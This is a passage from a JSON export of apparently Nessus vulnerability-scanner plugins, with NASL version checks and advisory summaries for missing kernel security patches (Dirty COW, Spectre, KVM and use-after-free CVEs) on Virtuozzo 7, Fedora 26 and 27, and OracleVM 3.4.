\"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-693.1.1.vz7.37.30\",\n \"patch\",\"readykernel-patch-37.30-39.1-2.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:13:18", "description": "According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 31, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-12T00:00:00", "title": "Virtuozzo 7 : readykernel-patch (VZA-2017-110)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-8824", "CVE-2017-1000407", "CVE-2017-16939", "CVE-2016-5195", "CVE-2017-1000405"], "modified": "2017-12-12T00:00:00", "cpe": ["cpe:/o:virtuozzo:virtuozzo:7", "p-cpe:/a:virtuozzo:virtuozzo:readykernel"], "id": "VIRTUOZZO_VZA-2017-110.NASL", "href": "https://www.tenable.com/plugins/nessus/105166", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105166);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\n \"CVE-2017-1000405\",\n \"CVE-2017-1000407\",\n \"CVE-2017-16939\",\n \"CVE-2017-8824\"\n );\n\n script_name(english:\"Virtuozzo 7 : readykernel-patch (VZA-2017-110)\");\n script_summary(english:\"Checks the readykernel output for the updated patch.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Virtuozzo host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the vzkernel package and the\nreadykernel-patch installed, the Virtuozzo installation on the remote\nhost is affected by the following vulnerabilities :\n\n - dccp_disconnect() set the socket state to DCCP_CLOSED\n but did not properly free some of the resources\n associated with that socket. This could result in a\n use-after-free and could potentially allow an attacker\n to escalate their privileges.\n\n - The Linux kernel is vulnerable to a use-after-free\n issue. It could occur while closing a xfrm netlink\n socket, in xfrm_dump_policy_done. A user/process could\n use this flaw to potentially escalate their privileges\n on a system.\n\n - A flaw was found in the patches used to fix the 'Dirty\n COW' vulnerability (CVE-2016-5195). An attacker, able\n to run local code, can exploit a race condition in\n transparent huge pages to modify usually read-only huge\n pages.\n\n - A vulnerability was found in the kernel virtualization\n module (KVM) for the Intel processors. A guest system\n could flood the I/O port 0x80 with write requests,\n which could crash the host kernel, resulting in DoS.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Virtuozzo security advisory.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://help.virtuozzo.com/customer/portal/articles/2909950\");\n # https://readykernel.com/patch/Virtuozzo-7/readykernel-patch-33.22-39.1-2.vl7/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?6bc504c3\");\n script_set_attribute(attribute:\"solution\", value:\"Update the readykernel patch.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:virtuozzo:virtuozzo:readykernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:virtuozzo:virtuozzo:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Virtuozzo Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Virtuozzo/release\", \"Host/Virtuozzo/rpm-list\", \"Host/readykernel-info\");\n\n exit(0);\n}\n\ninclude(\"global_settings.inc\");\ninclude(\"readykernel.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/Virtuozzo/release\");\nif (isnull(release) || \"Virtuozzo\" >!< release) audit(AUDIT_OS_NOT, \"Virtuozzo\");\nos_ver = pregmatch(pattern: \"Virtuozzo Linux release ([0-9]+\\.[0-9])(\\D|$)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Virtuozzo 7.x\", \"Virtuozzo \" + os_ver);\n\nif (!get_kb_item(\"Host/Virtuozzo/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Virtuozzo\", cpu);\n\nrk_info = get_kb_item(\"Host/readykernel-info\");\nif (empty_or_null(rk_info)) audit(AUDIT_UNKNOWN_APP_VER, \"Virtuozzo\");\n\nchecks = make_list2(\n make_array(\n \"kernel\",\"vzkernel-3.10.0-514.26.1.vz7.33.22\",\n \"patch\",\"readykernel-patch-33.22-39.1-2.vl7\"\n )\n);\nreadykernel_execute_checks(checks:checks, severity:SECURITY_HOLE, release:\"Virtuozzo-7\");\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:12:54", "description": "Contains several backported bugfixes, including the fix for\nCVE-2017-1000405\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-15T00:00:00", "title": "Fedora 27 : kernel (2017-b0c1f44130) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000405"], "modified": "2018-01-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-B0C1F44130.NASL", "href": "https://www.tenable.com/plugins/nessus/105954", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-b0c1f44130.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105954);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000405\");\n script_xref(name:\"FEDORA\", value:\"2017-b0c1f44130\");\n\n script_name(english:\"Fedora 27 : kernel (2017-b0c1f44130) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Contains several backported bugfixes, including the fix for\nCVE-2017-1000405\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-b0c1f44130\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-b0c1f44130\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"kernel-4.13.16-302.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:12:35", "description": "Contains several backported bugfixes, including the fix for\nCVE-2017-1000405\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 19, "cvss3": {"score": 7.0, "vector": "AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-05T00:00:00", "title": "Fedora 26 : kernel (2017-9ea11e444d) (Dirty COW)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-1000405"], "modified": "2017-12-05T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-9EA11E444D.NASL", "href": "https://www.tenable.com/plugins/nessus/105013", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-9ea11e444d.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105013);\n script_version(\"3.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-1000405\");\n script_xref(name:\"FEDORA\", value:\"2017-9ea11e444d\");\n\n script_name(english:\"Fedora 26 : kernel (2017-9ea11e444d) (Dirty COW)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Contains several backported bugfixes, including the fix for\nCVE-2017-1000405\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-9ea11e444d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/05\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-1000405\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-9ea11e444d\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"kernel-4.13.16-202.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 6.9, "vector": "AV:L/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T04:52:11", "description": "The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Revert 'kernel.spec: Require the new microcode_ctl.'\n (Brian Maly)\n\n - xen-blkback: add pending_req allocation stats (Ankur\n Arora) [Orabug: 27386890]\n\n - xen-blkback: move indirect req allocation out-of-line\n (Ankur Arora) \n\n - xen-blkback: pull nseg validation out in a function\n (Ankur Arora) \n\n - xen-blkback: make struct pending_req less monolithic\n (Ankur Arora) \n\n - x86: Clean up IBRS functionality resident in common code\n (Kanth Ghatraju) [Orabug: 27403317]\n\n - x86: Display correct settings for the SPECTRE_V2 bug\n (Kanth Ghatraju) \n\n - Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth\n Ghatraju) [Orabug: 27403317]\n\n - x86/cpu: Implement CPU vulnerabilites sysfs functions\n (Thomas Gleixner) [Orabug: 27403317]\n\n - sysfs/cpu: Fix typos in vulnerability documentation\n (David Woodhouse) \n\n - sysfs/cpu: Add vulnerability folder (Thomas Gleixner)\n [Orabug: 27403317]\n\n - x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David\n Woodhouse) [Orabug: 27403317]\n\n - x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth\n Ghatraju) [Orabug: 27403317]\n\n - KVM: x86: Add memory barrier on vmcs field lookup\n (Andrew Honig) (CVE-2017-5753)\n\n - KVM: VMX: remove I/O port 0x80 bypass on Intel hosts\n (Andrew Honig) [Orabug: 27402301] (CVE-2017-1000407)\n (CVE-2017-1000407)\n\n - xfs: give all workqueues rescuer threads (Chris Mason)\n [Orabug: 27397568]\n\n - ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao\n Martins)", "edition": 28, "cvss3": {"score": 7.4, "vector": "AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H"}, "published": "2018-01-22T00:00:00", "title": "OracleVM 3.4 : Unbreakable / etc (OVMSA-2018-0012) (Spectre)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-5753", "CVE-2017-1000407"], "modified": "2021-01-02T00:00:00", "cpe": ["cpe:/o:oracle:vm_server:3.4", "p-cpe:/a:oracle:vm:kernel-uek", "p-cpe:/a:oracle:vm:kernel-uek-firmware"], "id": "ORACLEVM_OVMSA-2018-0012.NASL", "href": "https://www.tenable.com/plugins/nessus/106226", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The package checks in this plugin were extracted from OracleVM\n# Security Advisory OVMSA-2018-0012.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(106226);\n script_version(\"3.8\");\n script_cvs_date(\"Date: 2019/09/27 13:00:35\");\n\n script_cve_id(\"CVE-2017-1000407\", \"CVE-2017-5753\");\n script_xref(name:\"IAVA\", value:\"2018-A-0020\");\n\n script_name(english:\"OracleVM 3.4 : Unbreakable / etc (OVMSA-2018-0012) (Spectre)\");\n script_summary(english:\"Checks the RPM output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote OracleVM host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The remote OracleVM system is missing necessary patches to address\ncritical security updates :\n\n - Revert 'kernel.spec: Require the new microcode_ctl.'\n (Brian Maly)\n\n - xen-blkback: add pending_req allocation stats (Ankur\n Arora) [Orabug: 27386890]\n\n - xen-blkback: move indirect req allocation out-of-line\n (Ankur Arora) \n\n - xen-blkback: pull nseg validation out in a function\n (Ankur Arora) \n\n - xen-blkback: make struct pending_req less monolithic\n (Ankur Arora) \n\n - x86: Clean up IBRS functionality resident in common code\n (Kanth Ghatraju) [Orabug: 27403317]\n\n - x86: Display correct settings for the SPECTRE_V2 bug\n (Kanth Ghatraju) \n\n - Set CONFIG_GENERIC_CPU_VULNERABILITIES flag (Kanth\n Ghatraju) [Orabug: 27403317]\n\n - x86/cpu: Implement CPU vulnerabilites sysfs functions\n (Thomas Gleixner) [Orabug: 27403317]\n\n - sysfs/cpu: Fix typos in vulnerability documentation\n (David Woodhouse) \n\n - sysfs/cpu: Add vulnerability folder (Thomas Gleixner)\n [Orabug: 27403317]\n\n - x86/cpufeatures: Add X86_BUG_SPECTRE_V[12] (David\n Woodhouse) [Orabug: 27403317]\n\n - x86/cpufeatures: Add X86_BUG_CPU_MELTDOWN (Kanth\n Ghatraju) [Orabug: 27403317]\n\n - KVM: x86: Add memory barrier on vmcs field lookup\n (Andrew Honig) (CVE-2017-5753)\n\n - KVM: VMX: remove I/O port 0x80 bypass on Intel hosts\n (Andrew Honig) [Orabug: 27402301] (CVE-2017-1000407)\n (CVE-2017-1000407)\n\n - xfs: give all workqueues rescuer threads (Chris Mason)\n [Orabug: 27397568]\n\n - ixgbevf: handle mbox_api_13 in ixgbevf_change_mtu (Joao\n Martins)\"\n );\n # https://oss.oracle.com/pipermail/oraclevm-errata/2018-January/000822.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?026e66b2\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel-uek / kernel-uek-firmware packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:A/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:vm:kernel-uek-firmware\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:vm_server:3.4\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/12/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/22\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"OracleVM Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleVM/release\", \"Host/OracleVM/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/OracleVM/release\");\nif (isnull(release) || \"OVS\" >!< release) audit(AUDIT_OS_NOT, \"OracleVM\");\nif (! preg(pattern:\"^OVS\" + \"3\\.4\" + \"(\\.[0-9]|$)\", string:release)) audit(AUDIT_OS_NOT, \"OracleVM 3.4\", \"OracleVM \" + release);\nif (!get_kb_item(\"Host/OracleVM/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"OracleVM\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-4.1.12-112.14.13.el6uek\")) flag++;\nif (rpm_check(release:\"OVS3.4\", reference:\"kernel-uek-firmware-4.1.12-112.14.13.el6uek\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel-uek / kernel-uek-firmware\");\n}\n", "cvss": {"score": 6.1, "vector": "AV:A/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2021-01-01T04:44:20", "description": "Description of changes:\n\n[4.1.12-112.14.13.el7uek]\n- Revert 'kernel.spec: Require the new microcode_ctl.' (Brian Maly)\n\n[4.1.12-112.14.12.el7uek]\n- xen-blkback: add pending_req allocation stats (Ankur Arora) [Orabug: \n27386890]\n- xen-blkback: move indirect req allocation out-of-line (Ankur Arora) \n[Orabug: 27386890]\n- xen-blkback: pull nseg validation out in a function (Ankur Arora) \n[Orabug: 27386890]\n- xen-blkback: make struct pending_req less monolithic (Ankur Arora) 